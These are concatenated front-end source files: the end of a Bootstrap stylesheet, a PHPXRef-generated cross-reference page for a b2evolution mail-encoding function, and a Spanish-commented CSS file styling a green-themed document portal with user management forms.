text-shadow: 0 1px 2px rgba(0, 0, 0, .6);
filter: alpha(opacity=50);
opacity: .5;
}
.carousel-control.left {
background-image: -webkit-linear-gradient(left, color-stop(rgba(0, 0, 0, .5) 0%), color-stop(rgba(0, 0, 0, .0001) 100%));
background-image: linear-gradient(to right, rgba(0, 0, 0, .5) 0%, rgba(0, 0, 0, .0001) 100%);
filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#80000000', endColorstr='#00000000', GradientType=1);
background-repeat: repeat-x;
}
.carousel-control.right {
right: 0;
left: auto;
background-image: -webkit-linear-gradient(left, color-stop(rgba(0, 0, 0, .0001) 0%), color-stop(rgba(0, 0, 0, .5) 100%));
background-image: linear-gradient(to right, rgba(0, 0, 0, .0001) 0%, rgba(0, 0, 0, .5) 100%);
filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#00000000', endColorstr='#80000000', GradientType=1);
background-repeat: repeat-x;
}
.carousel-control:hover,
.carousel-control:focus {
color: #fff;
text-decoration: none;
filter: alpha(opacity=90);
outline: none;
opacity: .9;
}
.carousel-control .icon-prev,
.carousel-control .icon-next,
.carousel-control .glyphicon-chevron-left,
.carousel-control .glyphicon-chevron-right {
position: absolute;
top: 50%;
z-index: 5;
display: inline-block;
}
.carousel-control .icon-prev,
.carousel-control .glyphicon-chevron-left {
left: 50%;
}
.carousel-control .icon-next,
.carousel-control .glyphicon-chevron-right {
right: 50%;
}
.carousel-control .icon-prev,
.carousel-control .icon-next {
width: 20px;
height: 20px;
margin-top: -10px;
margin-left: -10px;
font-family: serif;
}
.carousel-control .icon-prev:before {
content: '\2039';
}
.carousel-control .icon-next:before {
content: '\203a';
}
.carousel-indicators {
position: absolute;
bottom: 10px;
left: 50%;
z-index: 15;
width: 60%;
padding-left: 0;
margin-left: -30%;
text-align: center;
list-style: none;
}
.carousel-indicators li {
display: inline-block;
width: 10px;
height: 10px;
margin: 1px;
text-indent: -999px;
cursor: pointer;
background-color: #000 \9;
background-color: rgba(0, 0, 0, 0);
border: 1px solid #fff;
border-radius: 10px;
}
.carousel-indicators .active {
width: 12px;
height: 12px;
margin: 0;
background-color: #fff;
}
.carousel-caption {
position: absolute;
right: 15%;
bottom: 20px;
left: 15%;
z-index: 10;
padding-top: 20px;
padding-bottom: 20px;
color: #fff;
text-align: center;
text-shadow: 0 1px 2px rgba(0, 0, 0, .6);
}
.carousel-caption .btn {
text-shadow: none;
}
@media screen and (min-width: 768px) {
.carousel-control .glyphicons-chevron-left,
.carousel-control .glyphicons-chevron-right,
.carousel-control .icon-prev,
.carousel-control .icon-next {
width: 30px;
height: 30px;
margin-top: -15px;
margin-left: -15px;
font-size: 30px;
}
.carousel-caption {
right: 20%;
left: 20%;
padding-bottom: 30px;
}
.carousel-indicators {
bottom: 20px;
}
}
.clearfix:before,
.clearfix:after,
.container:before,
.container:after,
.container-fluid:before,
.container-fluid:after,
.row:before,
.row:after,
.form-horizontal .form-group:before,
.form-horizontal .form-group:after,
.btn-toolbar:before,
.btn-toolbar:after,
.btn-group-vertical > .btn-group:before,
.btn-group-vertical > .btn-group:after,
.nav:before,
.nav:after,
.navbar:before,
.navbar:after,
.navbar-header:before,
.navbar-header:after,
.navbar-collapse:before,
.navbar-collapse:after,
.pager:before,
.pager:after,
.panel-body:before,
.panel-body:after,
.modal-footer:before,
.modal-footer:after {
display: table;
content: " ";
}
.clearfix:after,
.container:after,
.container-fluid:after,
.row:after,
.form-horizontal .form-group:after,
.btn-toolbar:after,
.btn-group-vertical > .btn-group:after,
.nav:after,
.navbar:after,
.navbar-header:after,
.navbar-collapse:after,
.pager:after,
.panel-body:after,
.modal-footer:after {
clear: both;
}
.center-block {
display: block;
margin-right: auto;
margin-left: auto;
}
.pull-right {
float: right !important;
}
.pull-left {
float: left !important;
}
.hide {
display: none !important;
}
.show {
display: block !important;
}
.invisible {
visibility: hidden;
}
.text-hide {
font: 0/0 a;
color: transparent;
text-shadow: none;
background-color: transparent;
border: 0;
}
.hidden {
display: none !important;
visibility: hidden !important;
}
.affix {
position: fixed;
}
@-ms-viewport {
width: device-width;
}
.visible-xs,
tr.visible-xs,
th.visible-xs,
td.visible-xs {
display: none !important;
}
@media (max-width: 767px) {
.visible-xs {
display: block !important;
}
table.visible-xs {
display: table;
}
tr.visible-xs {
display: table-row !important;
}
th.visible-xs,
td.visible-xs {
display: table-cell !important;
}
}
.visible-sm,
tr.visible-sm,
th.visible-sm,
td.visible-sm {
display: none !important;
}
@media (min-width: 768px) and (max-width: 991px) {
.visible-sm {
display: block !important;
}
table.visible-sm {
display: table;
}
tr.visible-sm {
display: table-row !important;
}
th.visible-sm,
td.visible-sm {
display: table-cell !important;
}
}
.visible-md,
tr.visible-md,
th.visible-md,
td.visible-md {
display: none !important;
}
@media (min-width: 992px) and (max-width: 1199px) {
.visible-md {
display: block !important;
}
table.visible-md {
display: table;
}
tr.visible-md {
display: table-row !important;
}
th.visible-md,
td.visible-md {
display: table-cell !important;
}
}
.visible-lg,
tr.visible-lg,
th.visible-lg,
td.visible-lg {
display: none !important;
}
@media (min-width: 1200px) {
.visible-lg {
display: block !important;
}
table.visible-lg {
display: table;
}
tr.visible-lg {
display: table-row !important;
}
th.visible-lg,
td.visible-lg {
display: table-cell !important;
}
}
@media (max-width: 767px) {
.hidden-xs,
tr.hidden-xs,
th.hidden-xs,
td.hidden-xs {
display: none !important;
}
}
@media (min-width: 768px) and (max-width: 991px) {
.hidden-sm,
tr.hidden-sm,
th.hidden-sm,
td.hidden-sm {
display: none !important;
}
}
@media (min-width: 992px) and (max-width: 1199px) {
.hidden-md,
tr.hidden-md,
th.hidden-md,
td.hidden-md {
display: none !important;
}
}
@media (min-width: 1200px) {
.hidden-lg,
tr.hidden-lg,
th.hidden-lg,
td.hidden-lg {
display: none !important;
}
}
.visible-print,
tr.visible-print,
th.visible-print,
td.visible-print {
display: none !important;
}
@media print {
.visible-print {
display: block !important;
}
table.visible-print {
display: table;
}
tr.visible-print {
display: table-row !important;
}
th.visible-print,
td.visible-print {
display: table-cell !important;
}
}
@media print {
.hidden-print,
tr.hidden-print,
th.hidden-print,
td.hidden-print {
display: none !important;
}
}
|
_functions/get7bitencoding.html | mgsolipa/b2evolution_phpxref | <!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<html>
<head>
<title>PHPXRef 0.7.1 : Unnamed Project : Function Reference: get7bitencoding()</title>
<link rel="stylesheet" href="../sample.css" type="text/css">
<link rel="stylesheet" href="../sample-print.css" type="text/css" media="print">
<style id="hilight" type="text/css"></style>
<meta http-equiv="content-type" content="text/html;charset=iso-8859-1">
</head>
<body bgcolor="#ffffff" text="#000000" link="#801800" vlink="#300540" alink="#ffffff">
<table class="pagetitle" width="100%">
<tr>
<td valign="top" class="pagetitle">
[ <a href="../index.html">Index</a> ]
</td>
<td align="right" class="pagetitle">
<h2 style="margin-bottom: 0px">PHP Cross Reference of Unnamed Project</h2>
</td>
</tr>
</table>
<!-- Generated by PHPXref 0.7.1 at Sat Nov 21 22:13:19 2015 -->
<!-- PHPXref (c) 2000-2010 Gareth Watts - gareth@omnipotent.net -->
<!-- http://phpxref.sourceforge.net/ -->
<script src="../phpxref.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript">
<!--
ext='.html';
relbase='../';
subdir='_functions';
filename='index.html';
cookiekey='phpxref';
handleNavFrame(relbase, subdir, filename);
logFunction('get7bitencoding');
// -->
</script>
<script language="JavaScript" type="text/javascript">
if (gwGetCookie('xrefnav')=='off')
document.write('<p class="navlinks">[ <a href="javascript:navOn()">Show Explorer<\/a> ]<\/p>');
else
document.write('<p class="navlinks">[ <a href="javascript:navOff()">Hide Explorer<\/a> ]<\/p>');
</script>
<noscript>
<p class="navlinks">
[ <a href="../nav.html" target="_top">Show Explorer</a> ]
[ <a href="index.html" target="_top">Hide Navbar</a> ]
</p>
</noscript>
[<a href="../index.html">Top level directory</a>]<br>
<script language="JavaScript" type="text/javascript">
<!--
document.writeln('<table align="right" class="searchbox-link"><tr><td><a class="searchbox-link" href="javascript:void(0)" onMouseOver="showSearchBox()">Search</a><br>');
document.writeln('<table border="0" cellspacing="0" cellpadding="0" class="searchbox" id="searchbox">');
document.writeln('<tr><td class="searchbox-title">');
document.writeln('<a class="searchbox-title" href="javascript:showSearchPopup()">Search History +</a>');
document.writeln('<\/td><\/tr>');
document.writeln('<tr><td class="searchbox-body" id="searchbox-body">');
document.writeln('<form name="search" style="margin:0px; padding:0px" onSubmit=\'return jump()\'>');
document.writeln('<a class="searchbox-body" href="../_classes/index.html">Class<\/a>: ');
document.writeln('<input type="text" size=10 value="" name="classname"><br>');
document.writeln('<a id="funcsearchlink" class="searchbox-body" href="../_functions/index.html">Function<\/a>: ');
document.writeln('<input type="text" size=10 value="" name="funcname"><br>');
document.writeln('<a class="searchbox-body" href="../_variables/index.html">Variable<\/a>: ');
document.writeln('<input type="text" size=10 value="" name="varname"><br>');
document.writeln('<a class="searchbox-body" href="../_constants/index.html">Constant<\/a>: ');
document.writeln('<input type="text" size=10 value="" name="constname"><br>');
document.writeln('<a class="searchbox-body" href="../_tables/index.html">Table<\/a>: ');
document.writeln('<input type="text" size=10 value="" name="tablename"><br>');
document.writeln('<input type="submit" class="searchbox-button" value="Search">');
document.writeln('<\/form>');
document.writeln('<\/td><\/tr><\/table>');
document.writeln('<\/td><\/tr><\/table>');
// -->
</script>
<div id="search-popup" class="searchpopup"><p id="searchpopup-title" class="searchpopup-title">title</p><div id="searchpopup-body" class="searchpopup-body">Body</div><p class="searchpopup-close"><a href="javascript:gwCloseActive()">[close]</a></p></div>
<h3>Function and Method Cross Reference</h3>
<h2><a href="index.html#get7bitencoding">get7bitencoding()</a></h2>
<b>Defined at:</b><ul>
<li><a href="../inc/_ext/swift/classes/Swift/Encoding.php.html#get7bitencoding">/inc/_ext/swift/classes/Swift/Encoding.php</a> -> <a onClick="logFunction('get7bitencoding', '/inc/_ext/swift/classes/Swift/Encoding.php.source.html#l20')" href="../inc/_ext/swift/classes/Swift/Encoding.php.source.html#l20"> line 20</a></li>
</ul>
<b>No references found.</b><br><br>
</ul>
<!-- A link to the phpxref site in your customized footer file is appreciated ;-) -->
<br><hr>
<table width="100%">
<tr><td>Generated: Sat Nov 21 22:13:19 2015</td>
<td align="right"><i>Cross-referenced by <a href="http://phpxref.sourceforge.net/">PHPXref 0.7.1</a></i></td>
</tr>
</table>
</body></html>
|
css/portal.css | teiman/qualidoc | /* Versión azul y verde. Sustituir los colores según la lista,
y redirecionar las imágenes a la carpeta "verde":
Ej.: ../img/triangulo-menu-02.png ==> ../img/verde/triangulo-menu-02.png
Equivalencia colores entre versión azul y verde :
303040 = 004130
4aa7c9 = 0d8538 (excepto en '.menu td a', '.boton-alta' y '.bocadillo-aviso' hay que cambiar el azul por: #02b284 -verde-)
5dccf4 = 0af7b9
*/
* {
color: #222;
font-size: 12px;
font-family: "Varela","Trebuchet MS",Arial,Helvetica,sans-serif !important;
line-height: 140%;
}
h1, h2, h3, h4, h5 {font-family: "Trebuchet MS",Arial,Helvetica,sans-serif !important;}
root {
display: block;
}
.ocultar , .oculto {
display:none!important;
}
.invisible {
visibility: hidden!important;
}
h1{
font-size: 18px;
}
h2{
font-size: 17px;
}
h3{
font-size: 16px;
}
h4{
font-size: 15px;
}
h5{
font-size: 14px;
}
input.int3 {
width: 4em;
}
input.nombre {
width: 20em;
}
/* -------------------------------- */
.contenido a.subcategoria {
color: #0d8538; /* en versión azul este color es: 4aa7c9 */
text-decoration:none;
text-transform: uppercase;
font-size: 11px;
font-weight: 700;
}
.contenido h1 {
font-family: "Arial Narrow", Arial,Helvetica,sans-serif;
text-transform: uppercase;
font-weight: bold;
}
.contenido h2 {
font-family: "Arial Narrow", Arial,Helvetica,sans-serif;
font-size: 16px;
margin:5px 0 0;
text-transform: uppercase;
font-weight: bold;
}
.contenido p {
color: #949599;
font-size: 11px;
font-family: "Trebuchet MS",Arial,Helvetica,sans-serif;
line-height: 1.35em;
}
/* -------------------------------- */
.menu td.seccion {
color: #50606d;
background-color: #CDD2D8;
font-size: 11px;
font-weight: bold;
font-family: "Trebuchet MS",Arial,Helvetica,sans-serif;
padding-left: 5px;
text-transform: uppercase;
}
.menu td {
border-left: 1px solid #A5AFB8;
border-right: 1px solid #A5AFB8;
border-top: 1px solid #A5AFB8;
padding-bottom:2px;
padding-top: 2px;
}
.menu td a {
text-decoration: none;
font-size: 11px;
font-family: "Trebuchet MS",Arial,Helvetica,sans-serif;
}
.menu td.enlaces {
background-color: #F8FCFD;
padding-left: 22px;
padding-top: 2px;
padding-bottom: 2px;
}
.menu {
border-bottom: 1px solid #A5AFB8;
width: 180px;
}
.enlaces a {color: #303010;}
/* -------------------------------- */
.listacategorias {
color: #003A56;
font-size: 11px;
list-style-type: square;
margin: 10px 5px 10px 0;
padding: 0px;
font-family: "Trebuchet MS",Arial,Helvetica,sans-serif;
}
.listacategorias li {
/*margin: 0 0 -5px;
padding: 0px;
width: 90%;*/
font-weight: normal;
}
.listacategorias a {
padding-left: 4px;
padding-right: 40px;
}
.listacategorias a:hover {
background-color: #EBF6FC;
}
.listacategorias {
padding-left: 22px;
padding-left: 15px;
}
.cajas , .cajas td {
border: 1px solid white;
}
/* ---- LAYOUT ----- */
.contenido {
background-color: white;
min-height: 600px;
text-align: left;
margin-top: 22px;
padding: 10px;
box-shadow: inset 1px 1px 5px #222;
background: transparent url('../img/fondo.png') center repeat;
background-position: 0 0;
}
body {
padding-top: 190px;
}
.hola{
color:white;
margin-bottom:100px;
}
.cajacontenido {
border-top: 10px solid #eff1f2;
border-right: 10px solid #eff1f2;
border-bottom: 10px solid #eff1f2;
border-left: 200px solid #eff1f2;
padding: 0px;
min-height: 90%;
text-align: left;
}
.siderbar {
position: absolute;
padding: 10px;
background-color: #eff1f2;
top:140px;
left: 0px;
max-width: 180px;
}
.siderbar a{
text-decoration:none;
padding-left:5px;
}
.siderbar span{
font-size:13px;
font-weight:bold;
text-transform:uppercase;
color:#ddd;
}
.headbar {
position: absolute;
top:0px;
left:0px;
width: 100%;
border: 0px solid blue;
background-color: #004130;
overflow: hidden;
margin-top:0px;
padding:0px;
height: 140px;
}
.migas td , .migas span {
font-size: 12px;
height: 19px;
}
.cabeceratitulo {
float:right;
background-color: white;
padding-left:10px;
padding-right:10px;
}
/* --- estilos --- */
html, body {
background-color: #eff1f2;
}
.alerta {
background-color: #eef;
padding-left: 10px;
padding-bottom: 10px;
padding-right: 10px;
padding-top: 3px;
}
fieldset {
border:1px solid #ccc;
margin-top:10px;
margin-bottom: 20px;
padding:5px;
}
legend {
padding: 0.2em 0.5em;
color:black;
font-size:12px;
}
.contenido a {
font-size: 11px;
font-family: "Trebuchet MS",Arial,Helvetica,sans-serif;
}
/* ---- */
.logo {
position:absolute;
top:0px;
left:0px;
width: 100%;
background-color: white;
}
.portalanagrama img {
border:0px solid gray;
margin-left: 200px;
}
/* ---- */
#cajausuario {
position: absolute;
top: 10px;
right: 10px;
z-index: 10;
}
#tablausuario td {
padding-top: 2px;
/*padding-right: 10px;*/
padding-bottom: 2px;
padding-left: 10px;
text-align: right;
/*border: 1px solid #BABFC1;*/
}
#cajausuario, #cajausuario * {
font-family: "Trebuchet MS",Arial,Helvetica,sans-serif;
font-size: 10px;
font-style: normal;
color: #7B8589;
text-transform: uppercase;
}
#tablausuario {
width: auto;
}
.ficherodescarga {
font-family: "Trebuchet MS",Arial,Helvetica,sans-serif;
font-size: 10px;
font-style: normal;
color: #7B8589;
float: right;
/*text-transform: uppercase;*/
}
.bloqueinterno {
margin-left: 20px;
margin-right: 20px;
margin-top: 4px;
margin-bottom: 8px;
padding-bottom: 4px;
}
/*.descripcionfichero {
border-bottom: 1px solid #ccc;
}*/
h2.titulovideo {
margin-bottom: 20px;
}
/* ---- */
.cajabuscarstandalone {
}
/* ------------- */
.titulodocumento{
padding-bottom: 10px;
}
.volverlink {
margin-bottom: 10px;
}
.botonenviar {
color: #333;
}
/* -- Gestion de usuarios -- */
.enlinea, .etiqueta-grupo {display: inline-block; margin-left: 5px;}
.gestion-usuarios {text-align: left; width: 99%;}
.etiqueta-grupo span {margin-left: 5px; font-size: 12px; color: #555;}
.etiqueta-grupo {padding: 1px 2px; background-color: #E8E8E8; border: 1px solid transparent; border-radius: 4px; clear:both; margin-right: 3px; margin-top: 4px;}
.etiqueta-grupo input[type="image"] {float: right !important; width: 13px; margin-top: 2px !important; margin-left: 5px; padding-right: 4px;}
.etiqueta-grupo:hover {background-color: #ccc; border: 1px ridge #fafafa; border-radius: 4px;}
.gestion-usuarios {margin-left: 15px; font-size: 14px;}
.gestion-usuarios tr:nth-child(2n+1) {background-color: rgba(190,190,190,0.5);}
.gestion-usuarios tr:first-child {background-color: transparent;}
.gestion-usuarios tr td {vertical-align: middle;}
.gestion-usuarios tr th {padding-top: 30px; padding-bottom: 10px; color: #004130;}
.gestion-usuarios input[type="image"] {margin-top: 4px; float: left;}
.gestion-usuarios input[type="image"]:hover {-ms-filter:"progid:DXImageTransform.Microsoft.Alpha(Opacity=50)"; filter:alpha(opacity=50); -moz-opacity: 0.5; -webkit-opacity: 0.5; -khtml-opacity: 0.5; opacity: 0.5;}
.etiqueta-grupo input[type="image"] {float: right; width: 13px; margin-top: 3px !important; margin-left: 5px; padding-right: 4px;}
.subtitulo {margin-left: 15px; margin-bottom: 30px; text-transform: uppercase; color: #004130; font-size: 20px;}
#direccion-correo {width: 250px;}
td.celda-buscador {padding-top: 25px; background-color: transparent; min-width: 170px;}
td.celda-buscador input[type="text"] {float: left; width: 135px; margin-right: 9px;}
.grupo-etiquetas {display: inline-block; margin: 0; float: left; width: 90%; margin-bottom: 4px;}
.admin-ico {margin-left: 5px; visibility: hidden; cursor: default; margin-right:0 !important;}
.js-admin {visibility: visible !important;}
.js-admin:hover {opacity: 1.0 !important; filter:alpha(opacity=100) !important; -ms-filter:"progid:DXImageTransform.Microsoft.Alpha(Opacity=50)" !important;}
.boton-alta {background-color: #004130;
/*background: #02b284;
background: -moz-linear-gradient(top, #02b284 0%, #004130 100%);
background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#02b284), color-stop(100%,#004130));
background: -webkit-linear-gradient(top, #02b284 0%,#004130 100%);
background: -o-linear-gradient(top, #02b284 0%,#004130 100%);
background: -ms-linear-gradient(top, #02b284 0%,#004130 100%);
background: linear-gradient(to bottom, #02b284 0%, #004130 100%);
filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#02b284', endColorstr='#004130',GradientType=0);*/ color: #f0f0f0; border-radius: 4px;border: 1px solid #004130; margin-left: 15px; width: 170px; height: 30px; font-size: 16px;
}
.boton-alta:hover {cursor: pointer; background-color: #0af7b9; border-color: #004130; color: #004130; /*-ms-filter:"progid:DXImageTransform.Microsoft.Alpha(Opacity=60)"; filter:alpha(opacity=60); -moz-opacity: 0.6; -webkit-opacity: 0.6; -khtml-opacity: 0.6; opacity: 0.6;*/}
.boton-aceptar {background-color: #02b284; color: #fafafa; border-radius: 4px;border: 1px solid #777; font-size: 14px;}
.boton-cancelar {background-color: #444; color: #fafafa; border-radius: 4px;border: 1px solid #777; font-size: 14px;}
.boton-aceptar:hover {cursor: pointer; border: 1px solid #222; background-color: #0af7b9; }
.boton-cancelar:hover {cursor: pointer; border: 1px solid #222; background-color: #777; }
.boton-cambiar {background-color: #02b284; color: #fafafa; border-radius: 4px;border: 1px solid #777; font-size: 14px;}
.boton-cambiar:hover {cursor: pointer; border: 1px solid #222; background-color: #0af7b9; }
.boton-generico {background-color: #02b284; color: #fafafa; border-radius: 4px;border: 1px solid #777; font-size: 14px;cursor:pointer}
/* -- Otros estilos -- */
.cabeceratitulo {padding-top: 3px; border-top-left-radius: 4px; background-color: #f0f0f0;}
.cajacontenido {border-top: 10px solid #004130; background-color: #004130; border-right: 10px solid #004130; border-bottom: 10px solid #004130; border-left: 200px solid #004130; margin-top: -60px;}
.contenido {background-color: #f0f0f0;}
.siderbar {background-color: #004130;}
.contenedorcabeceratitulo {background-color: #004130;}
#footer {background-color: #f0f0f0 !important; box-shadow: 0px -5px 5px #222;}
.copyline {color: #444 !important;}
.cajas td {border: none;}
.contenido {border-top-left-radius: 30px;}
.menu {margin-top: 23px;}
.listacategorias {list-style-type: none;}
.listacategorias li {margin-bottom: 3px;}
.listacategorias a {background: transparent url('../img/verde/carpeta.png') center no-repeat; background-position: 0 0; padding-left: 15px; margin-left: 20px; height: 20px; display: block; padding-left: 25px; padding-top: 3px;}
.listacategorias a:hover {color: #004130; background: transparent url('../img/verde/carpeta.png') center no-repeat; background-position: 0 -32px;}
.nombrecategoria {color: #004130;}
.contenido table.cajas {border: none; margin-top: 15px;}
td#hmenu1.seccion, td#hmenu2.seccion {color: #ddd; background-color: #004130; font-size: 13px; padding-bottom: 10px; vertical-align: baseline;}
td#hmenu1.seccion a, td#hmenu2.seccion a {color: #ddd; background-color: #004130; font-size: 13px; padding-bottom: 10px;}
td#hmenu2 {padding-top: 30px;}
td#hmenu2.seccion {color: #fff;}
.menu td {border: none;}
.menu {border-bottom: none;}
.menu td.enlaces {color: #0d8538; background-color: #004130; padding-left: 40px; padding-bottom: 5px; background: #004130 url('../img/verde/triangulo-menu-02.png') center no-repeat; background-position: 30px -86px;}
.menu td.enlaces a {}
/* --.menu td.enlaces .enlace-menu-admin {color: #0af7b9;}*/
.menu td.enlaces .enlace-menu-admin:hover {color: #ddd;}
.menu td.enlaces-admin {padding-left: 40px; padding-bottom: 5px; background: #004130 url('../img/verde/triangulo-menu-admin.png') center no-repeat; background-position: 30px -86px;}
.menu td.enlaces:hover {background-position: 30px 6px;}
.menu td a {color: #02b284; font-size: 12px;}
.menu td a:hover {color: #ddd;}
input[type="text"], input[type="password"] {border-radius: 4px; height: 26px; margin-right: 5px; text-indent: 5px; font-size: 13px !important; border: 2px inset #eee;}
input[type="text"]:focus, input[type="password"]:focus {color: #444;}
.celda-buscador input[type="text"], #busqueda-menu input[type="text"], .paquete-busqueda input[type="text"] {color: #aaa; }
#busqueda-menu input[type="text"] {max-width: 130px; border:0;}
.celda-buscador input[type="text"]:focus, #busqueda-menu input[type="text"]:focus, .paquete-busqueda input[type="text"]:focus {color: #444;}
.botonenviar2 {border-radius: 4px; background: #02b284 url('../img/lupa-buscar.png') center no-repeat; background-position: 3px 3px; text-indent: -9999px; cursor: pointer; width: 25px; height: 25px; border: 1px solid #999999; font-size: 12px !important;}
.siderbar .botonenviar2 {border-radius: 4px; background: #02b284 url('../img/lupa-buscar.png') center no-repeat; background-position: 3px 3px; text-indent: -9999px; cursor: pointer; width: 25px; height: 25px; border: 1px solid #fafafa; font-size: 12px !important;}
.fecha {border: none !important; text-align: left; padding: 0 !important;}
#username {padding-top: 0 !important; padding-left: 40px !important; font-weight: 700;background: #f0f0f0 url('../img/verde/user.png') center no-repeat; background-position: 23px 0}
#cajausuario #username {color: #02b284;}
.cerrar-sesion {text-align: right; margin-left: 10px; padding: 3px 0 !important; padding-left: 20px !important; padding-right: 5px !important; color: #f0f0f0 !important; border-radius: 4px; background: #02b284 url('../img/cerrar-sesion.png') center no-repeat; background-position: 2px 2px;}
.cerrar-sesion:hover {background: #0af7b9 url('../img/cerrar-sesion.png') center no-repeat; background-position: 2px 2px; cursor: pointer; color: #004130 !important;}
#logout {padding-top: 0 !important;}
.clear {clear: both;}
/* -- popup Gestion de grupos y usuarios -- */
#gruposexistentes, #grp_usr_existentes {margin-bottom: 5px;}
#grp_usr_existentes {margin-top: 20px;}
#grp_usr_existentes .js-grupo {padding-left: 25px; background: transparent url('../img/verde/grupo.png') center no-repeat; background-position: 5px 0;}
#grp_usr_existentes .js-usuario {padding-left: 25px; background: transparent url('../img/verde/usuario.png') center no-repeat; background-position: 5px -1px;}
#gruposexistentes input[type="text"], #grp_usr_existentes input[type="text"] {color: #444;}
#gruposexistentes li, #grp_usr_existentes li {height: 26px; margin-bottom: 4px;}
#gruposexistentes li input[type="image"], #grp_usr_existentes li input[type="image"] {vertical-align: -2px; margin-right: 5px; margin-left: 1px;}
#gruposexistentes li input[type="checkbox"], #grp_usr_existentes li input[type="checkbox"] {vertical-align: -2px;}
#gruposexistentes li span, #grp_usr_existentes li span {font-size: 13px; color: #004130;}
#gruposexistentes li input[type="image"]:hover {-ms-filter:"progid:DXImageTransform.Microsoft.Alpha(Opacity=50)"; filter:alpha(opacity=50); -moz-opacity: 0.5; -webkit-opacity: 0.5; -khtml-opacity: 0.5; opacity: 0.5;}
.paquete-busqueda {margin-top: 15px; margin-bottom:5px;}
.paquete-busqueda input[type="button"] {padding-top: 3px;}
#popupgrupos, #popuppermisos {height: auto !important; overflow: hidden; padding-bottom: 0;}
.contenedor-ocultar {height: 30px; margin: 5px auto;visibility: hidden;} /* -- mantiene la altura para ocultar los inputs -- */
.contenedor-ocultar input[type="button"] {font-size: 14px !important; margin-left: -1px;}
.ocultar-edicion {visibility: visible !important;}
.dialogbox-pie {width: 405px; margin-left: -25px; border-top: 1px solid #ccc; padding: 5px 0; margin-bottom: 0;}
.dialogbox-pie input {margin: 0; float: right;}
.botones-grupobox {width: 401px; margin-left: -18px; text-align: right; border-top: 1px solid #ccc; position: relative; bottom: 0; display: block;}
.botones-grupobox input[type="button"] {margin: 3px 0 !important;}
.js-bborrar {background-color: #d20000; color: #fafafa; border-radius: 4px; border: 1px solid #777; font-size: 14px !important;}
.js-bborrar:hover {background-color: red; border: 1px solid #222;}
ul#gruposexistentes li:nth-child(2n+1), ul#grp_usr_existentes li:nth-child(2n+1) {background-color: rgba(190,190,190,0.5);}
.sin-cebra li {background-color: transparent !important;}
/* -- formularios: alta usuarios / edicion usuarios -- */
.js-textoerror {color: red; font-size: 12px; height: 0; text-align: left; font-weight: 700; min-height: 25px; width: 95%; float: left; border-top: 2px solid red; margin-top: 2px; margin-left: 5px;}
#form-crear-usuario, #form-edicion-usuarios, #password-ediusuarios, .form-cancelar {float: left; margin-top: 5px; margin-left: 15px; width: 45%; min-width: 420px;}
/*#form-edicion-usuarios, #password-ediusuarios {float: left; margin-right: 20px; height: 170px;}*/
.maquetar-formulario {width: 100%; display: block; clear: both;}
input#administrador {width: auto !important;}
#form-crear-usuario label, #form-edicion-usuarios label, #password-ediusuarios label {font-size: 16px !important; width: 35%; display: inline-block; padding: 5px; background-color: #004130; color: #f0f0f0; float: left; margin-bottom:3px; margin-right:5px; border-radius:4px;}
#form-crear-usuario input[type="text"], #form-edicion-usuarios input[type="text"], #password-ediusuarios input[type="password"],#form-crear-usuario input[type="checkbox"], #form-edicion-usuarios input[type="checkbox"], #password-ediusuarios input[type="checkbox"] {width: 60%; border: none; border-radius: 0; height: 32px; padding-right: 5px; vertical-align: 2px; border-bottom: 1px solid #ccc; float: left;}
#empresa, #password2{border-bottom: none !important; vertical-align: 1px !important; margin-bottom: 10px;}
#form-crear-usuario input[type="submit"] {width: 90px; display: block; float: left; margin-right: 5px;}
#form-edicion-usuarios input[type="submit"], #password-ediusuarios input[type="submit"] {width: 150px; display: block; float: right; margin-right: 15px;}
#form-crear-usuario input[type="button"] {width: 90px; display: block; float: left;}
.botones-derecha {float: right; margin-top: 35px; margin-right: 15px;}
.form-cancelar {clear: both; float: left; width: 90%; margin-right: 265px; border-top: 1px solid #ccc;}
.form-cancelar input[type="submit"] {float: right; margin-top: 10px; margin-right: 0;}
#password-ediusuarios input[type="submit"] {margin-top: 70px;}
input#boton-cambiousuario {margin-top: 35px;}
/* -- Documentos -- */
h2.nombrecategoria {margin-left: 15px; text-indent: 5px; margin-bottom: 15px; padding: 6px 4px; background-color: #004130; color: #f0f0f0; margin-top: 20px; border-radius: 4px; width: 300px;}
.agregar-documento {padding: 3px; margin: 0 3px; border: 1px solid #00b383; border-radius: 4px; background-color: #005941; position: relative; top: -46px; left: 255px;}
.agregar-documento:hover {-ms-filter:"progid:DXImageTransform.Microsoft.Alpha(Opacity=80)"; filter:alpha(opacity=80); -moz-opacity: 0.8; -webkit-opacity: 0.8; -khtml-opacity: 0.8; opacity: 0.8; border: 1px solid #f0f0f0;}
.sinficheros {font-size: 12px; color: #004130; font-style: italic; margin-top: -39px; margin-left: 20px;}
.conficheros {margin-top: -39px;}
.volverlink {margin-bottom: 20px;}
.volverlink a {font-size: 12px; margin-left: 15px; padding-left: 20px; color: #0d8538; background: transparent url('../img/verde/volver.png') center no-repeat; background-position: 0 2px; text-decoration: none; font-weight: 700;} /* en versión azul este color es: 4aa7c9 */
.volverlink a:hover {color: #004130; background-position: 0 -17px; }
.migas {margin-bottom: -19px;}
.cabeceratitulo {display: none;}
.tablalimpia #container-migas:first-child {margin-left: 25px;}
.migas a {color: #f0f0f0; margin-left: 5px; text-decoration: none;}
.migas a:hover {color: #0d8538}
a#titulo-documento.subcategoria {font-size: 14px !important; margin: 0; font-weight: 700; color: #0d8538 !important; background: transparent url('../img/verde/archivos.png') center no-repeat; background-position: 0 0; margin-left: 25px; float: left; margin-bottom: 10px; }
a#titulo-documento.subcategoria:hover {background: transparent url('../img/verde/archivos.png') center no-repeat; background-position: 0 -30px; color: #004130 !important;}
.listadoficheros li {padding-top: 10px !important; border-top-left-radius: 10px; background-color: #f2f2f2; margin-bottom: 12px !important;}
.cajadescripcion p {font-size: 13px; color: #444; margin-bottom: 10px; clear: both; padding-left: 25px;}
.cajadescripcion {margin-bottom: 15px; clear: both;}
.verdescargar a {font-size: 10px !important; display: inline-block; margin-left: 0; height: auto; text-decoration: none !important; color: #0d8538 !important; font-weight: 400 !important; background: none !important; padding: 0; padding-right: 5px !important;}
.verdescargar a:hover {color: #004130 !important; cursor: pointer;}
.verdescargar img {padding-right: 3px; vertical-align: text-bottom;}
